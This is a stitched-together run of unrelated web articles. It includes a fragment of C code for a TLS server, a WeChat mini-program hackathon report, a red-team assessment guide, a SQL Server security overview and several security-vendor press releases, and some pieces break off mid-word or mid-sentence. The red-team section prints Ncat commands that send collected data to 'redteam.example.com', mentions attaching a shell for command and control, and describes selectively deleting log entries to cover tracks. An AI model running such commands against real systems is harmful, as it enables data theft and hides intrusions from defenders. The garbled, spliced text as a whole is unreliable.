        abort_connection_on_error(state);
        return;
    }

    int rc = BIO_write(state->read, buf->base, nread);
    assert(rc == nread);

    while (1) {
        int rc = SSL_read(state->ssl, buf->base, buf->len);
        if (rc <= 0) {
            rc = SSL_get_error(state->ssl, rc);
            if (rc != SSL_ERROR_WANT_READ) {
                push_ssl_errors();
                state->server->options.handler->connection_error(state);
                abort_connection_on_error(state);
                break;
            }
            maybe_flush_ssl(state);
            ensure_connection_intialized(state);
            // need to read more, we'll let libuv handle this
            break;
        }
        // should be rare: can only happen if we go for 0rtt or something like that
        // and we do the handshake and have real data in one network roundtrip
        if (ensure_connection_intialized(state) == 0)
            break;

        if (state->flags & CONNECTION_STATUS_WRITE_AND_ABORT) {
            // we won't accept anything from this kind of connection
            // just read it out of the network and let's give the write
            // a chance to kill it
            continue;
        }

        if (read_message(state, buf->base, rc) == 0) {
            // handler asked to close the socket
            if (maybe_flush_ssl(state)) {
                state->flags |= CONNECTION_STATUS_WRITE_AND_ABORT;
                break;
            }
            abort_connection_on_error(state);
            break;
        }
    }
    free(buf->base);
}

This method is called whenever libuv has more data to give us on the connection. The actual behavior is in ensure_connection_intialized() , where we check a flag on the connection, and if we haven't done the initialization of the connection, we check if OpenSSL considers the connection established. If it is established, we validate the connection's certificate and then send the OK to start the ball rolling.
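The post doesn't show validate_connection_certificate() itself; here is a hedged sketch of what such a check could look like with OpenSSL, where the thumbprint-list field names on the options struct are my assumption based on the startup code above:

#include <openssl/ssl.h>
#include <openssl/x509.h>
#include <openssl/evp.h>
#include <stdio.h>
#include <string.h>

// sketch: compare the client certificate's SHA-1 thumbprint against
// the allowed thumbprints given in server_state_init_t (field names assumed)
static int validate_connection_certificate(tls_uv_connection_state_t* state) {
    X509* cert = SSL_get_peer_certificate(state->ssl);
    if (cert == NULL)
        return 0; // no client certificate supplied, reject

    unsigned char digest[EVP_MAX_MD_SIZE];
    unsigned int digest_len;
    int ok = X509_digest(cert, EVP_sha1(), digest, &digest_len);
    X509_free(cert);
    if (ok != 1)
        return 0;

    // hex-encode the digest for comparison with the configured strings
    char hex[EVP_MAX_MD_SIZE * 2 + 1];
    for (unsigned int i = 0; i < digest_len; i++)
        sprintf(hex + i * 2, "%02X", digest[i]);

    for (int i = 0; i < state->server->options.allowed_certs_count; i++) {
        if (strcmp(hex, state->server->options.allowed_certs[i]) == 0)
            return 1; // thumbprint is on the allowed list
    }
    return 0; // unknown certificate
}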

You might have noticed a bunch of work with flags CONNECTIO

WeChat Mini Program Hackathon Concludes: 28 Hours Witness 27 Mini Programs Born from 0 to 1!


On the afternoon of December 16, 2018, the WeGeek WeChat Mini Program Hackathon (WeGeek Hackathon), hosted by Tencent's WeChat business group, concluded in Beijing. WeGeek Hackathon is a hackathon open to mini program developers and enthusiasts worldwide, aimed at fostering innovative development on the WeChat Mini Program platform and jointly building the mini program ecosystem.


WeGeek Hackathon: a gathering place for the coolest Mini Program Creators

This WeGeek Hackathon covered three categories: tools, lifestyle services, and education. It drew wide attention inside and outside the community as soon as it was announced, with more than 500 sign-ups within two weeks. After two rounds of screening, 160 developers qualified for the final competition.



Among these 160 developers and enthusiasts were engineers from top internet companies, students from Wuhan University, UESTC and other universities, and mini program enthusiasts from Taiwan. Some have a deep understanding of mini program use cases; others are highly skilled mini program developers. It was truly a gathering place for the coolest Mini Program Creators!

28 hours! Witnessing the birth of 27 mini programs from 0 to 1

Starting at 9 a.m. on December 15, the 160 developers and enthusiasts formed teams and, through 28 hours of on-site closed-door development, created 27 brand-new products from 0 to 1 and entered them for judging.



These 27 mini programs spanned education, transportation, travel, tools, big data and other industries; made use of QR scanning, sharing, camera, maps, AI, voice, AR and many other APIs; and solved real-world problems in kindergarten management, spoken-language learning, online carpooling, club management, idea capture, event registration, health management, lotteries, check-ins and more.

The Xiaoxiao Preschool (小小幼教) mini program solved real problems kindergarten teachers face in taking attendance, sharing photos of the children with parents, and assigning homework, and even provides some help in the scenario of a child going missing.

The AI Audible (AI 有声) mini program, built on a deep learning engine, combines AI with AR to provide convenient real-time sign language translation. It not only gives ordinary people better guidance in learning sign language, but also helps 30 million deaf and mute people better integrate into society.

The Huanting (换听) mini program uses AI to convert text into speech and builds a listening queue for the user, turning content consumption from "reading" into "listening" and freeing the user's eyes. Its team lead admitted that developing this fully featured mini program took no more than 10 hours of actual work.

The Spoken English Assistant (英语口语助手) mini program offers a low-barrier tool for practicing spoken English through movie dubbing, solving the problems of teacher-student interaction and content accumulation.

Beyond these, the Shijin (时锦) mini program set a very moving slogan, "Everyone is a book", and some mini programs even mapped out complete business models.

Xiaoxiao Preschool takes the crown

After 28 hours of speed development, the teams presented their work. Through judges' scoring and peer evaluation, the Xiaoxiao Preschool mini program took the crown!



Second and third prizes went to the AI Audible and Spoken English Assistant mini programs, respectively.

A Chan (阿禅), partner at Qingmang (轻芒) and a veteran mini program observer, noted that the "small" in mini programs and the much-complained-about "rules" look like annoying constraints, but in fact push developers to calm down and think first about what problem to solve and how to solve it before anything else. He added: "Excellent products start from solving problems in real scenarios, not from inventing strange use cases just to complete a task. At WeGeek Hackathon many participants focused their thinking on the problem itself, returning to the essence of the product, which is very good."

He Shiyou, CTO of ifanr (爱范儿), said he was excited to witness first-hand the "execution power" of mini programs in turning ideas into reality, and that technological progress rarely happens overnight; more often it accumulates into qualitative change precisely by lowering the barrier bit by bit.

Qi Ning, CTO of SegmentFault (思否), said that WeChat mini programs give developers a natural traffic entry point and distribution channel, letting them focus on building the product, while the rich APIs and SDK support lower the learning curve. At WeGeek Hackathon the developers showed strong execution and creativity, and, even more valuably, some products also reflected humanistic care. He personally admires the spirit of daring to imagine, and hopes more developers will step from backstage into the spotlight and realize big ambitions on mini programs.

At the end of the event, A Chan reviewed each entry one by one and offered professional guidance on commercial value. Many participants said they benefited greatly.


WeGeek Hackathon: powering a better mini program ecosystem

This WeGeek Hackathon brought together developers from all over; mini program enthusiasts from all walks of life turned their ideas into reality through mini programs. One participant said: "My idea came to life. Even though I didn't win a prize, it was absolutely worth it." Some participants formed teams on the spot; a short burst of brainstorming sparked their inspiration, and after two days they had become well-coordinated teammates who will keep developing their mini program after the competition.

WeGeek Hackathon will continue to foster a better mini program ecosystem and provide a stage for mini program developers and enthusiasts to showcase themselves.

Red Team Assessment Phases: Completing Objectives


The purpose of this phase of the assessment is fairly self-explanatory. In previous phases, the red team performed the operations necessary to set themselves up for success in achieving the goals of the assessment. This phase is focused on achieving those goals and often happens somewhat in parallel with the previous phase (e.g., it would be ridiculous not to grab a “flag” on a compromised machine because the red team wasn’t prepared to grab all of them). In the end, completing this phase and all previous ones should result in achieving all operational objectives or the ability to describe in detail why one or more were impossible to complete (i.e., because the client was doing a good job).

Scoping the Phase

The scope of this phase is defined by the goals of the assessment as defined during the planning session and included in the red team assessment agreement. These goals may range from collecting a certain set of defined “flags” (like sensitive data that should be protected for regulatory compliance) to a more “freeform” exercise in which the red team is instructed to exploit the client’s organization as fully as possible. Depending on the goals of the assessment, the red team may engage in a variety of activities on the target network in order to successfully complete the assessment.

Achieving Phase Goals

The goal of this phase is fairly straightforward yet also depends on the specifics of a certain assessment. As part of the planning and negotiation phase of the assessment, the red team will determine and agree on the goals and rules of engagement of the exercise with the client. In this phase, the red team will explore and exploit targets, exfiltrate collected data and perform cleanup activities in order to achieve the agreed-upon operational objectives.

Target Exploration

Most organizations have perimeter-focused cyber-defenses. The logic is that if they keep the “bad guys” out of the network, then it doesn’t really matter what’s happening inside of the network since all actions are taken by employees who (presumably) have no reason to try to harm the organization. However, once the red team has breached the organization’s defenses and established a foothold, this approach toward cybersecurity means that the red team has increased flexibility in what they can do.

Once inside the target network or on an exploited computer, exploration is key to a successful assessment. One of the responsibilities of the red team is to inform their clients about oversights in their cybersecurity. If a flag (like sensitive data) is known to be on a hardened machine, then trying to crack that machine is a must for the assessment. However, finding an unauthorized copy in a less-defended location is as valuable to the client, if not more so. By exploring each location that they've compromised, the red team brings a fresh set of eyes to the organization's security and may find nuggets formerly overlooked as "impossible."

Exploiting Targets of Opportunity

Depending on the terms of the red team assessment agreement, the goals of the exercise may not be clearly defined. In some assessments, the red team is provided with a set of “flags” to achieve (certain levels of access, credentials, data exfiltration and so on) and only finding these flags is necessary for a successful exercise. In other situations, the red team may be instructed to do anything that they can to exploit the network, with a full report of identified vulnerabilities to be reported at the end of the exercise.

In a more freeform exercise, exploitation of targets of opportunity is an essential part of the assessment. If, during target exploration, the red team identifies a way to gain access to a machine within the internal network, they should do so if it will not compromise the goals of the exercise (e.g., get them detected by the network defenders). Examples of targets of opportunity include unpatched services or operating systems, access to password hashes on a computer or domain controller and unattended documents or removable media discovered during a physical assessment. Since the red team testers are the “good guys,” it’s important to take care not to cause any unnecessary damage to the network or other operations.

Data Exfiltration

In many red team assessments, data exfiltration is a crucial component of achieving the assessment objectives. Organizations often want the red team to demonstrate that data can actually be exfiltrated from the organizational network (since it's difficult to breach data if you can't get it off of the organization's network).

Setting up covert communications channels was one of the goals of the previous phase. These methods may include using a certain port for something other than its intended purpose in order to take advantage of the fact that firewalls commonly leave certain ports open (80 for HTTP, 443 for HTTPS and so on).

Ncat (developed by the same group that makes the nmap network scanning tool) is a great tool for use in data exfiltration and command and control. By setting up a listener on an external computer and connecting to it from a compromised internal one, the red team can bypass firewall rules by creating an outbound connection (not commonly blocked) to a computer belonging to the red team. This connection can be used to control the remote computer (via shell access) and to exfiltrate data (including using TLS encryption).
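As a hedged illustration (the hostname and file names are invented; the flags are standard Ncat options):

# on the red team's external machine: listen on a firewall-friendly
# port with TLS and save whatever arrives
ncat --ssl -l 443 > exfiltrated-data.bin

# on the compromised internal host: make an outbound connection that
# looks like ordinary HTTPS traffic and push the data through it
ncat --ssl redteam.example.com 443 < collected-data.tar.gz

The same listener, combined with Ncat's -e option to attach a shell on the remote end, gives a basic command-and-control channel.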

Cleanup

An important final step in this stage of a red team assessment is cleaning up the effects of the red team on the target environment. A folder full of hacking tools on exploited machines and log files showing access attempts to different computers make it obvious to a network defender that something is going on. For the assessment to be realistic, red teams need to cover their tracks so as not to make things too easy for the network defenders.

One of the most common techniques for cleanup is the destruction of log files (used in 75% of real attacks, according to some reports). While red teams need to remain secret in order to carry out a realistic and useful assessment for the client, care should be taken in the cleanup stage of the operation. For example, hackers may corrupt or delete log files to hide their attacks, but this is probably not a viable option for a red team since it may hurt the organization and hide a real attack that happens to be occurring at the same time as the assessment.

An alternative to full log destruction is selective deletion of compromising records from the log. By removing only the log entries that show their presence on the system, the red team can conceal their operations without hurting the security of the target organization against real attacks. Recording the original version of the log file (before deletions) is also a good idea. However, the subject of cleanup should be discussed and included in the red team assessment agreement to ensure that the customer is comfortable with the red team modifying security logs in their environment.


Setting the Stage

The next and final phase of a red team assessment is reporting. In the end, the reason the client is paying for the assessment is to learn what they need to fix to secure their network.

In order to be successful in the reporting phase, the red team needs to take careful notes throughout the course of all of the preceding phases of the assessment. This allows them to provide comprehensive detail of their operations (which can be extremely important if something goes wrong) and detailed instructions for replicating exploits that can be used by the client to verify findings and test potential mitigations.

Sources:

- Ncat, Nmap
- Hackers are increasingly destroying logs to hide attacks, ZDNet

Security Features in SQL Server 2017


Microsoft has a number of security features in SQL Server 2017 that are useful for different purposes, depending on what you are trying to protect and what threat(s) you are trying to protect against. Some of these security features can have performance implications that you should be aware of as you decide which ones you want to implement. As an introduction, I'll cover some of the highlights of several of these security features.

Transparent Database Encryption (TDE)

Transparent Data Encryption (TDE) is SQL Server’s form of encryption at rest, which means that your data files, log file, tempdb files, and your SQL Server full, differential, and log backups will be encrypted when you enable TDE on a user database. This protects your data from someone getting access to those database or database backup files as long as that person doesn’t also have access to your encryption certificates and keys.

The initial TDE encryption scan for a user database will use one background CPU thread per data file in the database (if the data files are located on separate logical drives), slowly reading the entire contents of each data file into memory at a rate of about 52MB/second per data file.

The data is then encrypted with your chosen encryption algorithm and written back out to the data file at about 55MB/second (again per data file, if they are on separate logical drives). These sequential read and write rates appear to be purposely throttled and are consistent in my testing on multiple systems with various types of storage.

The initial TDE encryption process happens at the page level, underneath SQL Server, so it does not cause locking or generate transaction log activity like you would see with rebuilding an index. You can pause a TDE encryption scan by enabling global trace flag 5004, and un-pause it by disabling TF 5004 and running your ALTER DATABASE dbName SET ENCRYPTION ON command again, with no loss of progress, as sketched below.
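As an illustration, a minimal T-SQL sketch of enabling TDE and pausing/resuming the scan (the database, certificate and password names are placeholders):

USE master;

-- one-time setup: master key and server certificate (placeholder names)
CREATE MASTER KEY ENCRYPTION BY PASSWORD = '<StrongPasswordHere>';
CREATE CERTIFICATE TDECert WITH SUBJECT = 'TDE certificate';

USE MyUserDB;
-- database encryption key protected by the certificate
CREATE DATABASE ENCRYPTION KEY
    WITH ALGORITHM = AES_256
    ENCRYPTION BY SERVER CERTIFICATE TDECert;

-- kick off the background encryption scan
ALTER DATABASE MyUserDB SET ENCRYPTION ON;

-- pause the scan via global trace flag 5004 ...
DBCC TRACEON (5004, -1);

-- ... and resume it later with no loss of progress
DBCC TRACEOFF (5004, -1);
ALTER DATABASE MyUserDB SET ENCRYPTION ON;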

The CPU impact of encryption/decryption is greatly reduced on SQL Server 2016 and newer if you have a processor that supports AES-NI hardware instructions . In the server space, these were introduced in the Intel Xeon 5600 product family (Westmere-EP) for two-socket servers and the Intel Xeon E7-4800/8800 product family (Westmere-EX) for four and eight-socket servers. Any newer Intel product family will also have AES-NI support. If you are in doubt about whether your processor supports AES-NI, you can look for “AES” in the instructions field output from CPU-Z, like you see in Figure 1.


Figure 1: CPU-Z Output Showing AES Instruction Support

After you have encrypted a database with TDE, the runtime impact of TDE is hard to predictably quantify because it absolutely depends on your workload. If, for example, your workload fits entirely in the SQL Server buffer pool, then there would be essentially zero overhead from TDE. If, on the other hand, your workload consists entirely of table scans where the page is read and then flushed almost immediately, that would impose the maximum penalty. The maximum penalty for an I/O-volatile workload is typically less than 5% with modern hardware and with SQL Server 2016 or later.

The extra work of TDE decryption happens when you read data into the buffer pool from storage, and the extra work of TDE encryption happens when you write the data back out to storage. Making sure you are not under memory pressure, by having a large enough buffer pool and by doing index and query tuning will obviously reduce the performance impact of TDE. TDE does not encrypt FILESTREAM data, and a TDE encrypted database will not use instant file initialization for its data files.

Before SQL Server 2016, TDE and native backup compression did not work well together. With SQL Server 2016 and later, you can use TDE and native backup compression together as long as you specify a MAXTRANSFERSIZE that is greater than 64K in the backup command. It is also very important that you are current with your cumulative updates, since there have been multiple important TDE-related hotfixes for both SQL Server 2016 and SQL Server 2017. Finally, TDE is still an Enterprise Edition-only feature, even after SQL Server 2016 SP1 (which added many Enterprise-only features to Standard Edition).

Row-Level Security (RLS)

Row-Level Security (RLS) limits read access and most write-level access based on attributes of the user. RLS uses what is called predicate-based access control. SQL Server applies the access restrictions in the database tier, and they will be applied every time that data access is attempted from any tier.

RLS works by creating a predicate function that limits the rows that a user can access and then using a security policy and security predicate to apply that function to a table.

There are two types of security predicates, which are filter predicates and block predicates. Filter predicates will silently filter the rows available to read operations (SELECT, UPDATE, and DELETE), by essentially adding a WHERE clause that prevents the filtered rows from showing up in the result set. Filter predicates are applied while reading the data from the base table, and the user or application won’t know that rows are being filtered from the results. It is important, from a performance perspective, to have a row store index that covers your RLS filter predicate.

Block predicates explicitly, (with an error message) block write operations (AFTER INSERT, AFTER UPDATE, BEFORE UPDATE, and BEFORE DELETE) that would violate the block predicate.

Filter and block predicates are created as inline table-valued functions. You will also need to use the CREATE SECURITY POLICY T-SQL statement to apply and enable the filtering function on the relevant base table, as in the example below.
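A minimal sketch of a filter predicate and security policy (the schema, table and column names are invented for illustration):

-- schema to hold the security objects
CREATE SCHEMA Security;
GO

-- inline table-valued function: a row is visible only to its owning sales rep
CREATE FUNCTION Security.fn_SalesFilter(@SalesRep AS sysname)
    RETURNS TABLE
    WITH SCHEMABINDING
AS
    RETURN SELECT 1 AS fn_result
           WHERE @SalesRep = USER_NAME();
GO

-- apply the function to the table as a filter and a block predicate
CREATE SECURITY POLICY Security.SalesPolicy
    ADD FILTER PREDICATE Security.fn_SalesFilter(SalesRep) ON dbo.Sales,
    ADD BLOCK PREDICATE Security.fn_SalesFilter(SalesRep) ON dbo.Sales AFTER INSERT
    WITH (STATE = ON);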

RLS was added in SQL Server 2016 and is available in all editions of SQL Server 2016 and newer. RLS will not work with Filestream, PolyBase, or indexed views. RLS can hurt the performance of Full-Text Search, and it can force columnstore index queries to use row mode instead of batch mode. This Microsoft blog post has more information about the performance impact of RLS. A good example of how to use Query Store to tune RLS performance is here.

Dynamic Data Masking (DDM)

Dynamic data masking (DDM) can help limit sensitive data exposure by masking it to non-privileged users. DDM is applied at the table

Signal Sciences Named a 2018 Gartner Peer Insights Customers' Choice for Web Application Firewalls

Distinction based on end-user ratings of their experience purchasing
and using Signal Sciences next-gen WAF CULVER CITY, Calif. (BUSINESS WIRE) lt;a href=”https://twitter.com/hashtag/DevOps?src=hash” target=”_blank”gt;#DevOpslt;/agt;

Signal

, the world’s most trusted web defense solution, announced today that it has been named a

2018

Gartner Peer Insights Customers’ Choice for Web Application Firewalls

. The Gartner Peer Insights Customers’ Choice is a recognition

of “the best Web Application Firewalls” on the market as reviewed by

customers. To receive this distinction, a vendor must have a minimum

number of published reviews with an average overall rating above a

certain threshold.


Signal Sciences Named a 2018 Gartner Peer Insights Customers’ Choice for Web Ap ...

We believe the 2018 Gartner Peer Insights Customers’ Choice distinction

is the latest validation point for Signal Sciences and its innovation in

the WAF market. As the fastest-growing web application security company

in the market, Signal Sciences protects more than 10,000 applications

and over 200 billion production requests per week. Strong customer

demand has tripled revenue growth each year as organizations deploy

Signal Sciences to secure their most important web applications, APIs,

and microservices.

Signal Sciences received 5 out of 5 stars from over 80 verified customer

reviews from multiple vertical industries, including financial services,

healthcare, manufacturing, retail, media, and government, among others,

as of December 13, 2018 for its next-gen WAF. A highlight of the reviews

on Gartner Peer Insights that contributed to the company’s recognition

include:

“Unlike the majority of WAF products out there, Signal Sciences does not need hundreds of stateful rules to function properly. We were able to get Signal Sciences up and running within a few days and only required 10 or so rules to get configured and running in full-block mode.”
Head of Information Security, Infrastructure & IT, Finance Industry

“Signal Sciences is by far the only security product I’ve used that was not only simple to install, but also simple to use. We went from a POC to purchase in just weeks (usually it takes months) and once we installed it, we instantly put the WAF into blocking mode as it did such a good job without false positives.”
Senior Security Engineer, Communications Industry

“Web Application Firewalls have historically been a tricky piece of technology to leverage in existing environments; Signal Sciences’ approach means less operational overhead in getting it working and more time being spent leveraging the data it provides.”
Security and Risk Management, Healthcare Industry

“Almost an out-of-the-box solution for a complex footprint. The agent installation took about 10 min, the portal was created in 15 mins, we were seeing true alerts in less than 1hr.”
Enterprise Architect, Manufacturing Industry

“WAF has been a stale technology space for years, and the industry has been starving for innovation,” said Andrew Peterson, CEO of Signal Sciences. “We designed our revolutionary WAF solution to combat today’s application security threats. To us, Signal Sciences’ 5 out of 5 star rating on Gartner Peer Insights is a validation that our next-gen WAF technology is the innovation customers have been waiting for. We’re grateful to be working with customers, such as Under Armour, Adobe, Chef and WeWork, among others, and we will continue to protect them and the rest of our customers against the more than 100 million web attacks we monitor every month.”

Signal Sciences next-gen WAF and RASP technology is the only solution in the application security market that works across any architecture, providing the broadest coverage against real threats and attack scenarios as well as integrations into DevOps tools that enable engineering and operations teams to share security responsibility.

To see all Signal Sciences Gartner Peer Insights Customers’ Choice reviews, please visit: https://www.gartner.com/reviews/market/web-application-firewalls/vendor/signal-science

Related Links:

● Announcement: LeanTaaS Secures Cloud-Based Apps on AWS with Signal Sciences
● Announcement: Remitly Implements Signal Sciences to Protect Sensitive Mobile Customer Data and Ensure PCI Compliance
● Announcement: Signal Sciences Announces Network Learning Exchange and Power Rules for Unrivaled Web Application Threat Detection and Prevention
● Blog: Security’s Shift Right
● Blog: Three Ways Legacy WAFs Fail
● Blog: Demand More From Your Web Application Firewall

Follow Signal Sciences:

● Twitter: @SignalSciences
● Facebook: SignalSciences
● LinkedIn: signal-sciences

About Peer Insights:

Peer Insights is an online platform of ratings and reviews of IT software and services that are written and read by IT professionals and technology decision-makers. The goal is to help IT leaders make more insightful purchase decisions and help technology providers improve their products by receiving objective, unbiased feedback from their customers. Gartner Peer Insights includes more than 70,000 verified reviews in more than 200 markets. For more information, please visit www.gartner.com/reviews/home.

Gartner Peer Insights Customers’ Choice constitute the subjective
opinions of individual end-user reviews, ratings, and data applied
against a documented methodology; they neither represent the views of,
nor constitute an endorsement by, Gartner or its affiliates.

About Signal Sciences

Signal Sciences protects the web presence of the world’s leading brands. With its patented approach to WAF and RASP, Signal Sciences helps companies defend their journey to the cloud and DevOps with a practical and proven approach, built by one of the first teams to experience the shift. Based in Culver City, California, Signal Sciences customers include Under Armour, Etsy, Adobe, Datadog, WeWork and more. For more information, please visit www.signalsciences.com.

Contacts

Juanita Mo
424-404-1200
press@signalsciences.com

Industrial IoT platform gets updates from Pulse Secure


Pulse Secure version 9.0R3, a new release of the company's industrial IoT platform, aims to help customers secure industrial IoT devices and streamline maintenance activities for greater production-line output.

Pulse Secure, a provider of Secure Access solutions to both enterprises and service providers, announced the release of Pulse Policy Secure (PPS) 9.0R3, extending its Zero Trust Security model to IIoT devices and smart factories. The new version enables factories to streamline machinery repairs and reduce costly production downtime through IT-managed secure access. It also secures networks by extending behavioral analytics to IoT devices, detecting anomalies and preventing their compromise.

PPS dynamically profiles a network to discover, classify, and apply policies to IoT devices, and includes a built-in IoT device identification library. The solution also integrates with Next Generation Firewall (NGFW) solutions to provide identity and device security state data, and to strengthen the micro-segmentation that isolates and manages IoT devices on enterprise networks.

Aberdeen recently reported that 82 percent of companies experienced unplanned downtime in the past three years, which can cost a company as much as $260,000 an hour. The resulting downtime halts production and lowers profit, because factory-floor repairs often take days when security requirements mandate that service technicians physically visit the factory to diagnose and repair the problem.

How PPS Reduces Risks for Manufacturers

The latest PPS release uses a combined NAC and VPN approach that enables IT teams to grant remote secure access (authenticated and encrypted) to support contractors, expediting repair and return to service of factory IIoT systems for greater uptime and productivity.

The latest release of PPS also provides sophisticated behavioral analytics that alert security teams to anomalous IoT device behavior and automatically require additional authentication factors. PPS 9.0 builds baseline behavior profiles for managed and unmanaged IoT devices using information correlated from multiple sources such as NetFlow and user and device data. With these profiles, the platform detects anomalous activity, malware infections, and domain-generation attacks, allowing security teams to respond to threats and take preemptive measures before attacks succeed.

PPS 9.0 automatically discovers and profiles IIoT systems, such as factory floor SCADAs, PLCs and HMIs, or office building HVAC systems, providing dynamic visibility and securing them by enforcing policies for local and remote access by authorized users and contractors. PPS 9.0 also automatically provisions IIoT devices to next-generation firewalls (NGFWs) to facilitate remote access without provisioning overhead.

“Manufacturing customers are using IoT to retool their factory floors, creating smart production lines that report their health and operational efficiency. One benefit of this approach is that customers can proactively perform preventative or predictive maintenance on machines to avoid costly production outages,” said Prakash Mana, Pulse Secure’s vice president of product management. “Our latest Pulse Secure release helps customers not only secure the smart factory floor, but it also helps streamline their maintenance activities by giving service technicians remote access to the equipment they maintain. Regardless if they are on the factory floor or in their remote office, our Zero Trust Security limits technician access to the equipment they maintain and requires that they use secured end-user devices to perform their work.”

Read more: https://www.pulsesecure.net


Pure Storage: ML leads to high NPS


Pure Storage uses machine learning to help its customers' systems run better, and some of its customers use Pure Storage arrays to make their machine learning systems run better.

Each Pure Storage array generates between 600MB and 1GB of telemetry data per day, including behavioural data concerning workload characteristics, Pure Storage international CTO Alex McMullan told iTWire.

Different types of data are directed to different streams. So temperature alerts and information about network issues flow to the help desk for immediate attention. Some issues can be fixed remotely, often before an actual fault occurs; others are brought to the customer's attention.

This type of service has led to Pure achieving an NPS (net promoter score) in the mid-80s, he said. For comparison, Macquarie Telecom claims "Australia's best" customer experience based on an NPS of 76, and the average NPS of the Australian retail industry is 15, according to the Perceptive Group.

If you think an NPS of 15 sounds low, keep in mind that retail achieved the second-highest industry-wide NPS in Australia for 2018, trailing only the charity sector, which had an NPS of 27. US retail managed 54, according to Forbes.

But back to Pure's telemetry. Applying machine learning to the data also allows the company to identify issues caused by hardware or software provided by other vendors. In addition, customers can use it to predict the effect of making changes to their arrays, such as upgrading a controller.

The company is very aware that there are significant differences between workloads. Pure Storage was originally used largely in conjunction with VMware, etc, but now software such as Mongo and Cassandra is commonplace, and these workloads have very different characteristics in terms of storage use. So the models used to analyse the telemetry data keep changing; Pure's "data science team never stops," said McMullan.

To process all this data, Pure augments its on-premises infrastructure with AWS, which McMullan describes as "a great force multiplier."

Pure has more than 10PB of data stored on AWS, but "much more" is stored on premises. The company is moving even more data on-premises in order to take advantage of its own FlashBlade hardware to improve analytics performance.

Looking at AI more generally, McMullan sees it as "an undisciplined, unregulated space." What regulations exist vary significantly across jurisdictions; there's no agreement on how accurate a model needs to be (see, for example, recent concerns over the accuracy of face recognition used by police in the UK); and the 'black box' nature of most models leaves people wondering whether any conscious or unconscious bias has gone into their development.

McMullan suggests that if the international community can agree on air traffic lanes, it should be able to come up with overarching guidelines for AI.

He's not suggesting that all applications should be regarded in the same way. But there will be a high level of reliance on some AIs (eg, autonomous vehicles), so lots of ongoing checks are reasonable, especially when a given set of inputs do not necessarily lead to the same output.

It's important to realise that the computer isn't always right, he suggested.

Another issue that needs attention is data ownership (does healthcare and vehicle data belong to the individual or the owner, or to the manufacturer or a third-party provider?), he said.

That raises some interesting issues. Should a hospital be allowed to train an AI using patients' data without their explicit consent? Is that consent meaningful if it was granted as part of 'take it or leave it' terms and conditions, eg where no consent means no treatment? Should future patients only benefit from their predecessors' contribution to the development of AI-assisted diagnosis and treatment if they in turn allow their data to be used in that tool's ongoing development and training?


T-Mobile and Sprint merger officially cleared by US national security panel, still needs antitrust approval


It was reported on Friday that T-Mobile and Sprint would likely receive approval from U.S. national security officials for their $26 billion merger. The Wall Street Journal reports that T-Mobile was granted approval for its takeover of Sprint today after “several months of negotiation with company representatives.”



The approval comes from the Committee on Foreign Investment in the U.S., or Cfius. The committee is led by the Treasury Department and is tasked with reviewing foreign deals for national security concerns. It can recommend the president block potential deals if such issues are uncovered.

In the case of the deal between Sprint and T-Mobile, Cfius is obligated to review details because T-Mobile’s majority owner is Deutsche Telekom, which is Germany-based. Meanwhile, Sprint’s parent, SoftBank Group, is Japan-based.

Friday’s report stated that approval of the deal was contingent upon both parent companies agreeing to reduce their use of Huawei devices. Today’s report notes that Cfius previously required Sprint to remove Huawei equipment from its U.S. network in 2013 when SoftBank purchased a controlling stake in the carrier. Deutsche Telekom went through a similar process when it entered the U.S. market.

This time around, however, neither Deutsche Telekom nor SoftBank are required to “significantly change its business or operations” as a result of the Cfius review. Changes are limited to T-Mobile, Sprint, and their subsidiaries, the report says:

Neither Deutsche Telekom nor SoftBank is required to significantly change its own business or operations as a result of Cfius’s demands, according to the terms of the merger. Any potential changes are limited to T-Mobile, Sprint and their respective subsidiaries, deal documents show.

Of note, Cfius has no insight into the networks overseas of Deutsche Telekom and SoftBank.

Approval by Cfius is only the next step in the approval process for the T-Mobile and Sprint deal. The takeover still needs approval from antitrust officials including the FCC and DOJ. The FCC review just recently resumed after a brief delay in September. The deal faces pushback from several parties who fear it would reduce competition, cost thousands of jobs, and more.


Akamai Received Top Scores in Gartner’s New Report "Critical Capabilities for Cloud Web Application Firewalls Services"


Are you in the process of selecting a web application firewall (WAF), or thinking about whether your current solution is adequate? For many organizations, selecting the right WAF to protect their business is not an easy task. The threat landscape is changing fast, and hackers are very creative in their own ways. The good news is that Gartner just released a new report, “Critical Capabilities for Cloud Web Application Firewalls Services”, written by Jeremy D’Hoinne, Ayal Tirosh, Claudio Neiva, and Adam Hils, 6 December 2018. Gartner compares key WAF vendors across three industry-relevant use cases. I am proud to say that Akamai received top scores in two out of the three use cases:

● Mobile application
● Web scale critical business application
● Public facing web application

The Akamai results matter to you for the following reasons:

1) In the use case Mobile Application, Akamai achieved the highest score with 3.38 out of 5. This is especially relevant as more and more organizations open their business via APIs and mobile applications. As pointed out in Akamai’s State of the Internet Summer 2018 report , we have seen that bots are trying to evade detection or pretend to be a human being for fraud and abuse purposes. Imitation of mobile device browsers is on the rise and currently one of the most common types of browser imitation.



2) In the use case Web Scale Critical Business Applications Akamai scores highest with 3.7 out of 5. Critical business applications are the crown jewels and are, therefore, of special interest for hackers and malicious attacks. As the legendary bank robber Willie Sutton replied when asked why he robbed banks, “Because that’s where the money is.” Business critical applications are the “bank” in the cyber world and Akamai helps you to protect your “bank” with our edge security solutions like WAF and bot management.



3) In the use case Public Facing Web Applications, Akamai scored 3.36 out of 5. Well, we can’t win everything. Jokes aside, organizations simply don’t have the people or time to protect all of their public-facing websites. In October we announced a new capability, an additional firewall rule set, which provides automated protection of websites, applications, and APIs with minimal operational effort for our customers. This allows them to quickly apply automated protection to the many additional sites that go online on short notice or for a short period of time, or that host less sensitive information and had therefore remained unprotected so far.



What else is covered in this report?

Gartner discusses several critical WAF capabilities. I will not review all of them, but just highlight a few which have especially high relevance after this year’s security events.

I do agree that DDoS protection is a critical capability. This is particularly obvious, as we have seen a 16% increase in the number of DDoS attacks during the last year. The industry also experienced the largest DDoS attack ever, Memcached, earlier this year. Roughly speaking, attack size doubles every two years.

This increase in overall attacks makes geographic scalability and presence important, for two reasons. First, as a security vendor, you want to be where your customers are, to provide them the best experience. Second, you want to be as close to the attackers as possible, in order to mitigate them as quickly as possible. Akamai is usually only one hop away from 90% of all attackers, which keeps malicious traffic off the network and results in less interference. Akamai’s huge footprint also allows our experts to see, follow, and mitigate a massive number of daily attacks. This knowledge feeds into Akamai’s firewall rules and security products, making them some of the best in the industry.

